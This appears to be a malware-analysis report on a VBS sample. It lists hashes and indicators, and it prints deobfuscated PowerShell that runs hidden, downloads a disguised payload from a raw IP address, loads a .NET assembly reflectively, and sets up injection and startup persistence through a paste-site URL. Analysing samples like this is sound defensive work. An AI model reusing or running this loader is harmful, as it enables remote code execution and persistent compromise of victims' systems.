| Hash | Hash Value |
|---|---|
| MD5 | 98e3aeec9930f862d54a8dbb61f4b554 |
| Sha1 | 3057ca57a6346a718b51c53259f63d58a274febe |
| Sha256 | bfaaf672b1741b950b48b3f2296d79bf38c18bc8f14fd1b38905721299811386 |
| Sha384 | 3ef6f600c1dbea4bf933fda92859d678b33ea77ea4561ac0f363ab33b70431f8cf0a4e4a4d419aac4a50356f7299891c |
| Sha512 | 982363e7cf9369f7286100fa63b6c2fd771ecdfa44755c812cf9e76c9e0505b5276e95b6d97e5d16c3b2d4e8ff91087c375e35a938fa738a8f25660a9386db9f |
| SSDeep | 384:WLgFhg5nG6FwmXvJlxFxYXN/MEaRvAhpKoi0sVRXCSlah9HsSoSHHVFADn:WMFhg5nZFwmR7efvKRyZHHVmn |
| TLSH | 27D2D766BE2DD3264814020DFFCB2C16DE6C44904E0591A5FB3CCD9C1E2A42A9FB6E77 |
| Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | Invoke-Expression |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTlTUmpaalcwQjFOMDhDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJzEnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ0Nhc1BvbCcsJycsJ0Nhc1BvbCcsJzAnLCdodHRwczovL3Bhc3RlZnkuYXBwL3E0aWNvcHV0L3JhdycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywndmJzJywnMScsJzAnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression" |
| Deobfuscated PowerShell | Invoke-Expression |
| Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://www.ostrosoft.com/smtp.html | 98e3aeec9930f862d54a8dbb61f4b554 |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression" Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Base64-Block] |
| Deobfuscated PowerShell | $null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9SRjZjW0B1N08CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "1", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "0", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "0", "dpeqgyPkky", "0", "startup_onstart") } )) Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS] |
| Deobfuscated PowerShell | powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Invoke-Expression" Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] |
| Deobfuscated PowerShell | Invoke-Expression Malicious | 98e3aeec9930f862d54a8dbb61f4b554 > 98e3aeec9930f862d54a8dbb61f4b554.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command] |